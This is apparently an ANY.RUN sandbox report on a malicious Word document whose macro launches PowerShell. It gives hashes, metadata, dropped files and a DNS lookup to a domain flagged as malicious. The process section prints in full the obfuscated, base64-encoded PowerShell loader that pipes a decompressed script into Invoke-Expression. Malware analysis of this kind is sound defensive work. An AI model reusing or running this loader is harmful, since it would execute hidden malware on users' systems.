analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7677d18de1d4e6076cc2a8c82d4e4a696e7aa73f37169dbe6d7df025113273c7

Full analysis: https://app.any.run/tasks/69a452ad-09f9-4ed3-9e1e-50af02288c7d
Verdict: Malicious activity
Analysis date: July 11, 2019, 18:15:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: vhfctdaiqdwtohitkakspufxki, Subject: pgjkywhvea, Author: gurqerlfqmptpohzdbgulxktt, Comments: tlsgxddknzmsmjjbhabi, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Jul 3 09:28:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

3CDC199A80210C138216833B66066B94

SHA1:

39451A910480EE337458BBEBE6B537C948BE49E3

SHA256:

7677D18DE1D4E6076CC2A8C82D4E4A696E7AA73F37169DBE6D7DF025113273C7

SSDEEP:

768:GPxgsJyfu44vbf/L60WwFPbsdEJg8aTMh4m3yeD1xz99eNrz/sfip:Gf5bf/5d1TPkMe6yeD13grB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2984)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2984)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2592)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2984)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2984)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Bytes: 23552
Company: kwlchtywgletwhyziwbtavhd
Manager: waovzucrwipheqkfngn
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:07:03 08:28:00
CreateDate: 2018:04:19 18:59:00
TotalEditTime: 3.0 minutes
Software: Microsoft Office Word
RevisionNumber: 11
LastModifiedBy: Пользователь Windows
Template: Normal
Comments: tlsgxddknzmsmjjbhabi
Keywords: -
Author: gurqerlfqmptpohzdbgulxktt
Subject: pgjkywhvea
Title: vhfctdaiqdwtohitkakspufxki
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2984"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7677d18de1d4e6076cc2a8c82d4e4a696e7aa73f37169dbe6d7df025113273c7.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2592"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco IAAoACAALgAoACcATgBFAFcAJwArACcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAFMAWQBTAHQARQBNAGAALgBpAG8AYAAuAGMATwBtAFAAcgBgAEUAYABzAFMAaQBPAGAATgAuAGQARQBgAEYAbABhAFQAZQBgAFMAdAByAGUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBlADYANABzAFQAUgBpAG4ARwAoACcAUgBZAC8AQgBiAG8ASgBBAEcASQBUAHYAVABmAG8ATwBlADYAQgBaAEMASABWAEoAbABLAFkAVwBRAHAAcABXAHIAQwBGAHAAMABGAGkAMABoADcAYQBKAHUAUAAyAFIAcgBTAHUANwBzAHEAdABVAEMAZQA5AGUARABsAFkAdgBNADUAZQBaAHkAVABjAEcAbQA0AHYAKwAvAGYATQBPAEIAUQBnAFgAYwBzADQASABiAEwAWABGAHYAagBHAGkANAAxAG0AUwB2AGcAUQBHAEYASAB0AHYAcAA2AEMAVQBwAGMAZwBZAEIAeAB0AC8AWQB0AHMANABkAFcAeABNADQAQgBmAGEAdABIAEMAegBoADkAbAAzAFEARQB4AGMAWQBCAHQARAAxAFIARwB0AEwAWAArAEEAYQBtAHkAaABHAEIAYgBKAGcAbABTAHcAWABBAHgAZQBHAGMAUwBKAGIAKwB4ADMAMAAzAEQAOABkAEIAdwBFAE8ATgBkAGEAZQBvADYAagBoAGUARABIAGIAcgBlADQASQA2AHoASQBoAE0ATwBxAHIAVgBOAEoAdABTAFkAeQBsADQAOAA4AHkATwBEAFEASQAyAHUARgBpAFoASwBjAGEAUgBQAGYAWQBNAHYAUABSAEEAawBwAHoAVQAwAGoAbQBzAGkATgBHADcATgAzAHgAQQBwADAASAByAFoAcQBYAFIANwBxAEUAeABZAEoAUgBSAFYAegBrAFkAWgBaAHgASQBlAFgAdwBpADMANgBQADIAbgA1AFUAWQBaAE0AcwA2AFUAZgBnAGUANQBFAEwAYgBxAEcAVgBqAFkAdAArAHoAbABDACsARABBAGUANgBSAHgAMQBWAG8AQwA2AGIAcQAvAHYAVwBxAGoAKwBDAEYAbQA2AEsAbwBUAFMAagBDAG8AeQBLAFEAVQBGAHAAYgA0ADgANwB5ADEASgBwADkAcQA4AGoAQwA5AGIAMAByAFgAZgBOAEQAVABWAE4ASwArAGIANQB2AHIAcQBEAHcAPQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBFAFMAUwBJAE8ATgBtAE8AZABlAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAGUAYQBkAGUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEARAB0AG8AZQBOAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcAZQB4ACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 344
Read events
885
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRADF.tmp.cvr
MD5:
SHA256:
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8P2L73FFDQ15EIK9PLLW.temp
MD5:
SHA256:
2984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:502C188EFFDB19D1D5A7F9068CB8D2B7
SHA256:7F961E3BA098F75256992569DE14015481AE680B5DB8A2F04B230C9805F59E03
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:080211D3E234AD6F4C8C844E84C45DC4
SHA256:8FD7C68D3B4807CB3CADA8788ABC2D39858125B48EFEB2E47039AE9D76D6E496
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF101436.TMPbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$77d18de1d4e6076cc2a8c82d4e4a696e7aa73f37169dbe6d7df025113273c7.docpgc
MD5:736DBEE3123364ED7696A7AB04968BCE
SHA256:B294F570F8E1621E59F4351429291EECF04D65FA565EC59928C80FCFCBE7FAF5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
toolz22n5.info
malicious

Threats

No threats detected
No debug info